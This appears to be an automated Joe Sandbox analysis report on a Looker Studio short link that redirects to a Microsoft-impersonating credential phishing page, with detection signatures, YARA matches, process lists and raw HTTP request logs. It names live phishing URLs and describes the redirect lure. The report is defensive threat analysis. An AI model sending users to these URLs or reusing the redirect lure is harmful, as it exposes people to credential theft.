Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://lookerstudio.google.com/s/r0LPf6tGFnw

Overview

General Information

Sample URL:http://lookerstudio.google.com/s/r0LPf6tGFnw
Analysis ID:1624026
Infos:

Detection

HTMLPhisher
Score:60
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Yara detected HtmlPhish54
AI detected suspicious Javascript
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 3028 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6776 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1216 --field-trial-handle=1908,i,1000798072012189468,2701915882668230964,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6412 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://lookerstudio.google.com/s/r0LPf6tGFnw" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
SourceRuleDescriptionAuthorStrings
0.64.id.script.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
    5.13.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
      5.15.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
        5.16.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
          No Sigma rule has matched
          No Suricata rule has matched

          Click to jump to signature section

          Show All Signature Results

          Phishing

          barindex
          Source: https://documentsclouddatacenterfiles.com/Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The URL 'documentsclouddatacenterfiles.com' does not match the legitimate domain for Microsoft., The URL contains multiple generic terms and does not include 'microsoft', which is suspicious., The domain does not have any direct association with Microsoft and could be attempting to impersonate a legitimate service., The presence of input fields for 'Email, phone, or Skype' is typical for phishing attempts targeting Microsoft accounts. DOM: 5.16.pages.csv
          Source: Yara matchFile source: 0.64.id.script.csv, type: HTML
          Source: Yara matchFile source: 5.13.pages.csv, type: HTML
          Source: Yara matchFile source: 5.15.pages.csv, type: HTML
          Source: Yara matchFile source: 5.16.pages.csv, type: HTML
          Source: 0.51.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://view.documentsclouddatacenterfiles.com/SNS... This script exhibits high-risk behaviors, including dynamic code execution (redirecting to an external URL) and data exfiltration (storing the current URL in a cookie). The domain 'documentsclouddatacenterfiles.com' is also suspicious and not a known, reputable domain. These factors indicate a high likelihood of malicious intent, such as a phishing or credential harvesting attempt.
          Source: https://documentsclouddatacenterfiles.com/HTTP Parser: Number of links: 0
          Source: https://documentsclouddatacenterfiles.com/HTTP Parser: Base64 decoded: 2b05aa8b-20f1-4dae-b8e4-d287c4333d8003c187b5-56f5-48da-8a92-d1d07e2153a4
          Source: https://documentsclouddatacenterfiles.com/HTTP Parser: Title: Sign in does not match URL
          Source: https://documentsclouddatacenterfiles.com/HTTP Parser: Iframe src: https://login.live.com/Me.htm?v=3
          Source: https://documentsclouddatacenterfiles.com/HTTP Parser: <input type="password" .../> found
          Source: https://lookerstudio.google.com/reporting/81df319f-c619-47b3-a6ca-c725ddb997af?s=r0LPf6tGFnwHTTP Parser: No favicon
          Source: https://lookerstudio.google.com/reporting/81df319f-c619-47b3-a6ca-c725ddb997af?s=r0LPf6tGFnwHTTP Parser: No favicon
          Source: https://lookerstudio.google.com/reporting/81df319f-c619-47b3-a6ca-c725ddb997af?s=r0LPf6tGFnwHTTP Parser: No favicon
          Source: https://lookerstudio.google.com/reporting/81df319f-c619-47b3-a6ca-c725ddb997af/page/p_4gb3na7ypd?s=r0LPf6tGFnwHTTP Parser: No favicon
          Source: https://lookerstudio.google.com/reporting/81df319f-c619-47b3-a6ca-c725ddb997af/page/p_4gb3na7ypd?s=r0LPf6tGFnwHTTP Parser: No favicon
          Source: https://lookerstudio.google.com/reporting/81df319f-c619-47b3-a6ca-c725ddb997af/page/p_4gb3na7ypd?s=r0LPf6tGFnwHTTP Parser: No favicon
          Source: https://documentsclouddatacenterfiles.com/EyIqNHAA?office365cloud=trueHTTP Parser: No favicon
          Source: https://documentsclouddatacenterfiles.com/EyIqNHAA?office365cloud=trueHTTP Parser: No favicon
          Source: https://documentsclouddatacenterfiles.com/HTTP Parser: No <meta name="author".. found
          Source: https://documentsclouddatacenterfiles.com/HTTP Parser: No <meta name="author".. found
          Source: https://documentsclouddatacenterfiles.com/HTTP Parser: No <meta name="author".. found
          Source: https://documentsclouddatacenterfiles.com/HTTP Parser: No <meta name="copyright".. found
          Source: https://documentsclouddatacenterfiles.com/HTTP Parser: No <meta name="copyright".. found
          Source: https://documentsclouddatacenterfiles.com/HTTP Parser: No <meta name="copyright".. found
          Source: chrome.exeMemory has grown: Private usage: 9MB later: 29MB
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.77.188
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /s/r0LPf6tGFnw HTTP/1.1Host: lookerstudio.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /reporting/81df319f-c619-47b3-a6ca-c725ddb997af?s=r0LPf6tGFnw HTTP/1.1Host: lookerstudio.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=GBrk4Cwm7WXeWu6aphAIdIp_MQi9gUsEoSh7FyZLTZv0KhRmQLBSeaVov2C5rAqZUuZQ8ErWTRYa7DJ4-rnS4wvptxW2ExP3dB9lfzozkRFCHuC1HncEL15cRxeif-VZxRIALtN371CoqmjVgBgFuFtCcQMFb3i8FyvN-kpeJrpCZ3pwtpoo9d7tjyaV
          Source: global trafficHTTP traffic detected: GET /js/client.js HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://lookerstudio.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=GBrk4Cwm7WXeWu6aphAIdIp_MQi9gUsEoSh7FyZLTZv0KhRmQLBSeaVov2C5rAqZUuZQ8ErWTRYa7DJ4-rnS4wvptxW2ExP3dB9lfzozkRFCHuC1HncEL15cRxeif-VZxRIALtN371CoqmjVgBgFuFtCcQMFb3i8FyvN-kpeJrpCZ3pwtpoo9d7tjyaV
          Source: global trafficHTTP traffic detected: GET /js/client.js HTTP/1.1Host: apis.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=GBrk4Cwm7WXeWu6aphAIdIp_MQi9gUsEoSh7FyZLTZv0KhRmQLBSeaVov2C5rAqZUuZQ8ErWTRYa7DJ4-rnS4wvptxW2ExP3dB9lfzozkRFCHuC1HncEL15cRxeif-VZxRIALtN371CoqmjVgBgFuFtCcQMFb3i8FyvN-kpeJrpCZ3pwtpoo9d7tjyaV
          Source: global trafficHTTP traffic detected: GET /recaptcha/api.js?trustedtypes=true&render=6LcE_6MUAAAAACM2aL4qbFG8PNDIIl4krUNCLmXE HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://lookerstudio.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=GBrk4Cwm7WXeWu6aphAIdIp_MQi9gUsEoSh7FyZLTZv0KhRmQLBSeaVov2C5rAqZUuZQ8ErWTRYa7DJ4-rnS4wvptxW2ExP3dB9lfzozkRFCHuC1HncEL15cRxeif-VZxRIALtN371CoqmjVgBgFuFtCcQMFb3i8FyvN-kpeJrpCZ3pwtpoo9d7tjyaV
          Source: global trafficHTTP traffic detected: GET /s/r0LPf6tGFnw HTTP/1.1Host: lookerstudio.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.lb.en.5oZHy0SiJxw.O/m=client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo-Hry6DG-RE4t9kNz_t6hiwmwXOmA/cb=gapi.loaded_0?le=scs HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://lookerstudio.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=GBrk4Cwm7WXeWu6aphAIdIp_MQi9gUsEoSh7FyZLTZv0KhRmQLBSeaVov2C5rAqZUuZQ8ErWTRYa7DJ4-rnS4wvptxW2ExP3dB9lfzozkRFCHuC1HncEL15cRxeif-VZxRIALtN371CoqmjVgBgFuFtCcQMFb3i8FyvN-kpeJrpCZ3pwtpoo9d7tjyaV
          Source: global trafficHTTP traffic detected: GET /recaptcha/api.js?trustedtypes=true&render=6LcE_6MUAAAAACM2aL4qbFG8PNDIIl4krUNCLmXE HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=GBrk4Cwm7WXeWu6aphAIdIp_MQi9gUsEoSh7FyZLTZv0KhRmQLBSeaVov2C5rAqZUuZQ8ErWTRYa7DJ4-rnS4wvptxW2ExP3dB9lfzozkRFCHuC1HncEL15cRxeif-VZxRIALtN371CoqmjVgBgFuFtCcQMFb3i8FyvN-kpeJrpCZ3pwtpoo9d7tjyaV
          Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.lb.en.5oZHy0SiJxw.O/m=client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo-Hry6DG-RE4t9kNz_t6hiwmwXOmA/cb=gapi.loaded_0?le=scs HTTP/1.1Host: apis.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=GBrk4Cwm7WXeWu6aphAIdIp_MQi9gUsEoSh7FyZLTZv0KhRmQLBSeaVov2C5rAqZUuZQ8ErWTRYa7DJ4-rnS4wvptxW2ExP3dB9lfzozkRFCHuC1HncEL15cRxeif-VZxRIALtN371CoqmjVgBgFuFtCcQMFb3i8FyvN-kpeJrpCZ3pwtpoo9d7tjyaV
          Source: global trafficHTTP traffic detected: GET /recaptcha/api2/anchor?ar=1&k=6LcE_6MUAAAAACM2aL4qbFG8PNDIIl4krUNCLmXE&co=aHR0cHM6Ly9sb29rZXJzdHVkaW8uZ29vZ2xlLmNvbTo0NDM.&hl=en&v=IyZ984yGrXrBd6ihLOYGwy9X&size=invisible&cb=6dx30beu4eu9 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://lookerstudio.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=GBrk4Cwm7WXeWu6aphAIdIp_MQi9gUsEoSh7FyZLTZv0KhRmQLBSeaVov2C5rAqZUuZQ8ErWTRYa7DJ4-rnS4wvptxW2ExP3dB9lfzozkRFCHuC1HncEL15cRxeif-VZxRIALtN371CoqmjVgBgFuFtCcQMFb3i8FyvN-kpeJrpCZ3pwtpoo9d7tjyaV
          Source: global trafficHTTP traffic detected: GET /recaptcha/api2/webworker.js?hl=en&v=IyZ984yGrXrBd6ihLOYGwy9X HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LcE_6MUAAAAACM2aL4qbFG8PNDIIl4krUNCLmXE&co=aHR0cHM6Ly9sb29rZXJzdHVkaW8uZ29vZ2xlLmNvbTo0NDM.&hl=en&v=IyZ984yGrXrBd6ihLOYGwy9X&size=invisible&cb=6dx30beu4eu9Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=GBrk4Cwm7WXeWu6aphAIdIp_MQi9gUsEoSh7FyZLTZv0KhRmQLBSeaVov2C5rAqZUuZQ8ErWTRYa7DJ4-rnS4wvptxW2ExP3dB9lfzozkRFCHuC1HncEL15cRxeif-VZxRIALtN371CoqmjVgBgFuFtCcQMFb3i8FyvN-kpeJrpCZ3pwtpoo9d7tjyaV
          Source: global trafficHTTP traffic detected: GET /recaptcha/api2/webworker.js?hl=en&v=IyZ984yGrXrBd6ihLOYGwy9X HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=GBrk4Cwm7WXeWu6aphAIdIp_MQi9gUsEoSh7FyZLTZv0KhRmQLBSeaVov2C5rAqZUuZQ8ErWTRYa7DJ4-rnS4wvptxW2ExP3dB9lfzozkRFCHuC1HncEL15cRxeif-VZxRIALtN371CoqmjVgBgFuFtCcQMFb3i8FyvN-kpeJrpCZ3pwtpoo9d7tjyaV
          Source: global trafficHTTP traffic detected: GET /js/googleapis.proxy.js?onload=startup HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://content-people-pa.googleapis.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=GBrk4Cwm7WXeWu6aphAIdIp_MQi9gUsEoSh7FyZLTZv0KhRmQLBSeaVov2C5rAqZUuZQ8ErWTRYa7DJ4-rnS4wvptxW2ExP3dB9lfzozkRFCHuC1HncEL15cRxeif-VZxRIALtN371CoqmjVgBgFuFtCcQMFb3i8FyvN-kpeJrpCZ3pwtpoo9d7tjyaV
          Source: global trafficHTTP traffic detected: GET /getReport?appVersion=20250210_0007 HTTP/1.1Host: lookerstudio.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=GBrk4Cwm7WXeWu6aphAIdIp_MQi9gUsEoSh7FyZLTZv0KhRmQLBSeaVov2C5rAqZUuZQ8ErWTRYa7DJ4-rnS4wvptxW2ExP3dB9lfzozkRFCHuC1HncEL15cRxeif-VZxRIALtN371CoqmjVgBgFuFtCcQMFb3i8FyvN-kpeJrpCZ3pwtpoo9d7tjyaV; _gid=GA1.3.993301056.1740506532; _gat=1; _ga_S4FJY0X3VX=GS1.1.1740506533.1.1.1740506545.0.0.0; _ga=GA1.3.1335553841.1740506532; _gat_marketingTracker=1
          Source: global trafficHTTP traffic detected: GET /external HTTP/1.1Host: lookerstudio.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://lookerstudio.google.com/reporting/81df319f-c619-47b3-a6ca-c725ddb997af/page/p_4gb3na7ypd?s=r0LPf6tGFnwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=GBrk4Cwm7WXeWu6aphAIdIp_MQi9gUsEoSh7FyZLTZv0KhRmQLBSeaVov2C5rAqZUuZQ8ErWTRYa7DJ4-rnS4wvptxW2ExP3dB9lfzozkRFCHuC1HncEL15cRxeif-VZxRIALtN371CoqmjVgBgFuFtCcQMFb3i8FyvN-kpeJrpCZ3pwtpoo9d7tjyaV; _gid=GA1.3.993301056.1740506532; _gat=1; _ga=GA1.3.1335553841.1740506532; _gat_marketingTracker=1; _ga_S4FJY0X3VX=GS1.1.1740506533.1.1.1740506547.0.0.0
          Source: global trafficHTTP traffic detected: GET /getImageV2?reportId=81df319f-c619-47b3-a6ca-c725ddb997af&id=ADpgoFVYV%2FnGjGKkaPduuVlic9dveoFsHciDQS2sgWmVRW9TG7npuYoJyyxcQE8YbagId8hkPN2b5pa2teWlLsUQlIsfEbmkvGearM8enCY1p8uWrdZPLddsmp6tCf0HcdOJ4PQM2Bv0PJgjYD6fK8OgcTJTDz60mlaVoidMtTQ%3D HTTP/1.1Host: lookerstudio.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://lookerstudio.google.com/reporting/81df319f-c619-47b3-a6ca-c725ddb997af/page/p_4gb3na7ypd?s=r0LPf6tGFnwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=GBrk4Cwm7WXeWu6aphAIdIp_MQi9gUsEoSh7FyZLTZv0KhRmQLBSeaVov2C5rAqZUuZQ8ErWTRYa7DJ4-rnS4wvptxW2ExP3dB9lfzozkRFCHuC1HncEL15cRxeif-VZxRIALtN371CoqmjVgBgFuFtCcQMFb3i8FyvN-kpeJrpCZ3pwtpoo9d7tjyaV; _gid=GA1.3.993301056.1740506532; _gat=1; _ga=GA1.3.1335553841.1740506532; _gat_marketingTracker=1; _ga_S4FJY0X3VX=GS1.1.1740506533.1.1.1740506547.0.0.0
